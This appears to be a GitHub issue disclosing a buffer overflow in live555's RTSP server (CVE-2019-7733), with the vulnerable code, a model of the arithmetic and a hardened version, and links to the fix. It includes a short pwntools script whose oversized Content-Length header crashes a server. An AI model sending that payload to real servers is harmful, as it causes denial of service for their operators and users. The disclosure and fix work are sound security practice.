
There is a buffer overflow which can lead to DoS in live555 v0.95

Open zounathan opened this issue 5 years ago • 4 comments

When parsing the request packet in function handleRequestBytes, the code doesn't check the content-length and uses it in memmove. This finally causes the buffer overflow.

    // contentLength comes straight from the parsed header; no upper bound is applied before use
    unsigned requestSize = (fLastCRLF+4-fRequestBuffer) + contentLength;
    numBytesRemaining = fRequestBytesAlreadySeen - requestSize;
    resetRequestBuffer(); // to prepare for any subsequent request
    
    if (numBytesRemaining > 0) {
      // source offset requestSize and length numBytesRemaining are both derived from contentLength
      memmove(fRequestBuffer, &fRequestBuffer[requestSize], numBytesRemaining);
      newBytesRead = numBytesRemaining;
    }

There is a content-length check, but it only sets parseSucceeded to false. This can't avoid the memmove.

    Boolean parseSucceeded = parseRTSPRequestString((char*)fRequestBuffer, fLastCRLF+2 - fRequestBuffer,
                                                    cmdName, sizeof cmdName,
                                                    urlPreSuffix, sizeof urlPreSuffix,
                                                    urlSuffix, sizeof urlSuffix,
                                                    cseq, sizeof cseq,
                                                    sessionIdStr, sizeof sessionIdStr,
                                                    contentLength);
    fLastCRLF[2] = '\r'; // restore its value
    // Check first for a bogus "Content-Length" value that would cause a pointer wraparound:
    if (tmpPtr + 2 + contentLength < tmpPtr + 2) {
    #ifdef DEBUG
      fprintf(stderr, "parseRTSPRequestString() returned a bogus \"Content-Length:\" value: 0x%x (%d)\n", contentLength, (int)contentLength);
    #endif
      parseSucceeded = False;
    }

I can make the server crash with a simple packet.

    from pwn import *
    p1 = remote("IP", Port)

    pl = "OPTIONS rtsp://10.113.214.93:8554/a.mkv RTSP/1.0\r\nCSeq: 1 \r\nUser-Agent: Lavf55.37.102\r\n"
    pl += "Content-Length: 4294927296\r\n\r\n"
    p1.send(pl)

zounathan avatar Feb 11 '19 05:02 zounathan
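The following is an added example, not code from the issue or from live555, that models the arithmetic the report describes: a header-derived byte count plus an unchecked Content-Length produces a source offset and a memmove length that wrap around, so a large header value turns into a small positive copy length with a source pointer far outside the request buffer. It then shows a range-checked version of the same computation and a strict Content-Length parser. The buffer size, the function names and the three-state result are assumptions for this model and are not the project's fix.

```c
#include <errno.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed fixed request-buffer size for this model (not live555's own constant). */
#define REQUEST_BUFFER_SIZE 20000u

enum request_state { REQ_REJECT, REQ_NEED_MORE, REQ_COMPLETE };

/* Arithmetic as described in the report: contentLength is folded into requestSize
   with no range check, and the remaining count is an int computed by unsigned
   subtraction. A huge Content-Length therefore yields a small positive count paired
   with a source offset far outside the buffer. Returns what memmove would be told. */
int unchecked_remaining(unsigned headerBytes, unsigned contentLength,
                        unsigned bytesSeen, unsigned *srcOffset) {
  unsigned requestSize = headerBytes + contentLength;      /* may wrap mod 2^32 */
  int numBytesRemaining = (int)(bytesSeen - requestSize);  /* wraps mod 2^32 */
  *srcOffset = requestSize;
  return numBytesRemaining;
}

/* Hardened model: 64-bit intermediates so nothing wraps, and the body length is
   bounded by the buffer before it is used as an offset or a memmove size. */
enum request_state checked_remaining(unsigned headerBytes, uint64_t contentLength,
                                     unsigned bytesSeen, unsigned *srcOffset,
                                     unsigned *remaining) {
  *srcOffset = 0;
  *remaining = 0;
  if (headerBytes > bytesSeen || bytesSeen > REQUEST_BUFFER_SIZE) return REQ_REJECT;
  uint64_t requestSize = (uint64_t)headerBytes + contentLength;
  if (requestSize > REQUEST_BUFFER_SIZE) return REQ_REJECT;  /* body can never fit */
  if (requestSize > bytesSeen) return REQ_NEED_MORE;          /* body still in flight */
  *srcOffset = (unsigned)requestSize;
  *remaining = bytesSeen - (unsigned)requestSize;             /* cannot wrap now */
  return REQ_COMPLETE;
}

/* Strict Content-Length parser: digits only, no sign, no overflow, no trailing garbage. */
bool parse_content_length(const char *request, uint64_t *out) {
  const char *p = strstr(request, "Content-Length:");
  if (!p) return false;
  p += strlen("Content-Length:");
  while (*p == ' ' || *p == '\t') p++;
  if (*p < '0' || *p > '9') return false;  /* rejects "-1", "+5" and an empty value */
  char *end;
  errno = 0;
  unsigned long long v = strtoull(p, &end, 10);
  if (errno == ERANGE) return false;
  if (*end != '\r' && *end != '\n') return false;
  *out = v;
  return true;
}

/* Feeds a constructed request carrying the header value quoted in the report
   through both paths; returns the hardened path's verdict. */
int demo(void) {
  const char *req = "OPTIONS rtsp://example.invalid/a.mkv RTSP/1.0\r\nCSeq: 1\r\n"
                    "Content-Length: 4294927296\r\n\r\n";  /* constructed input */
  uint64_t cl;
  unsigned header = (unsigned)strlen(req), bytesSeen = header, off, rem;
  if (!parse_content_length(req, &cl)) return -1;
  int n = unchecked_remaining(header, (unsigned)cl, bytesSeen, &off);
  printf("unchecked: memmove src offset %u, length %d (buffer is %u bytes)\n",
         off, n, REQUEST_BUFFER_SIZE);
  enum request_state s = checked_remaining(header, cl, bytesSeen, &off, &rem);
  printf("checked:   %s\n", s == REQ_REJECT ? "rejected"
                          : s == REQ_NEED_MORE ? "need more data" : "complete");
  return (int)s;
}

int main(void) { return demo() == REQ_REJECT ? 0 : 1; }
```

The checked version treats the parsed length as data to be validated against the buffer that will hold the body, not as an offset to trust; rejecting at parse time means the memmove is never reached with an out-of-range source, which is the condition the report's crash depends on.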

This was assigned CVE-2019-7733.

nluedtke avatar Feb 11 '19 22:02 nluedtke

This was addressed in 2019.05.12, please close.

http://www.live555.com/liveMedia/public/changelog.txt

hlef avatar May 12 '19 05:05 hlef

> This was addressed in 2019.05.12, please close.
>
> http://www.live555.com/liveMedia/public/changelog.txt

Could you kindly point me to the commit that fixed the issue ? Thanks :)

NicoleG25 avatar Jan 09 '20 14:01 NicoleG25

> This was addressed in 2019.05.12, please close. http://www.live555.com/liveMedia/public/changelog.txt
>
> Could you kindly point me to the commit that fixed the issue ? Thanks :)

@NicoleG25 As far as I recall: ef01f0a7db9d7a7660658d088e36c4c4d0d02e27, this line in particular https://github.com/rgaufman/live555/blob/master/liveMedia/RTSPServer.cpp#L717.

hlef avatar Jan 11 '20 08:01 hlef